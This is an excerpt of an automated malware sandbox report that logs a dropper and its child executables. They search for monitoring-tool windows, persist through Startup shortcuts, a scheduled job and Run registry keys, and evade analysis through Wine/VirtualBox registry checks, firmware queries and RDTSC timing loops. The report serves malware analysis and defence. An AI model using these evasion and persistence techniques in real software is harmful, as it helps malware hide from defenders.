Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LionGuard.url
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\System32\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LionGuard.url
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3907f97605.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3907f97605.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ee5495637.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3ee5495637.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 04dc07bf76.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 04dc07bf76.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c7f41aa061.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c7f41aa061.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008738001\fMb18eF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\662510\Ryan.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008743001\QwGWuQZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\GuardTech Solutions\LionGuard.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1008746001\04dc07bf76.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe System information queried: FirmwareTableInformation
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008733001\779ae05f2f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008744001\3907f97605.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008745001\3ee5495637.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1008747001\c7f41aa061.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F167 second address: 10F185 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F625CDF2468h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F185 second address: 10F196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F625CED05BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F196 second address: 10F19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28A602 second address: 28A61F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C5h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28A61F second address: 28A646 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F625CDF2466h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jo 00007F625CDF247Eh 0x00000014 ja 00007F625CDF246Eh 0x0000001a push eax 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 277068 second address: 27706C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2899C2 second address: 2899C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2899C6 second address: 2899D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2899D1 second address: 2899D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2899D9 second address: 2899E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F625CED05B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2899E6 second address: 289A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2477h 0x00000007 jnc 00007F625CDF2466h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 289A07 second address: 289A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F625CED05BAh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 289F59 second address: 289F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 289F5E second address: 289F63 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28B98E second address: 28B9D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007F625CDF2466h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F625CDF2475h 0x00000015 jmp 00007F625CDF2474h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d je 00007F625CDF2466h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28B9D0 second address: 28BA08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F625CED05CCh 0x00000016 jmp 00007F625CED05C6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 28BA4A second address: 28BA5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F625CDF2466h 0x00000014 rdtsc
